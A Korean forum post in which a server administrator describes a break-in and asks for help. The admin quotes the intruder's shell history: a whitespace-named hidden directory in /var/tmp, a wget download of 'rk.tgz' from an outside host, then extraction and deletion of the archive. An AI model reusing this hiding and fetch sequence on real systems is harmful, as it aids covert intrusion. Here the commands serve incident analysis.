이게 루트키트인가요--;;

얼마전 해킹을 당했는데요...
/var/ 에 있는 로그디렉토리를 모두 삭제해서 사실상 접속자를 구분하기는 불가능한데..
우연히 /var/tmp 밑에 이상한 점을 발견하였습니다.
공백 문자로 만들어서 wget 을 이용하여 멀 다운받았는데....

그 계정 .bash_history 를 살펴본 결과 아래와 같은 작업을 한것을 알아냈습니다.cd /var/tmp
ls -a
mkdir "  "
cd "  "
wget free-ftp.org/aslteam/rk.tgz
tar xzfv rk.tgz
rm -rf rk.tgz

rk 라고 하니.. 어디서 줏어들은 루트키트가 생각나는데....
제가 root 비밀번호는 해킹당하기 3~4일전 변경하여서 내부적으로 알지 못한 상태였으니
더군다나 /var 밑에는 root 권한이라서 삭제가 불가능 했을텐데...
root 권한을 따내려고 어떠한 작업을 했을꺼라는 생각만 추론적이였습니다.
헌데... 아마도 그 작업이 위와 같을꺼라는 생각이 드네요...

고수님이 고견 부탁드립니다.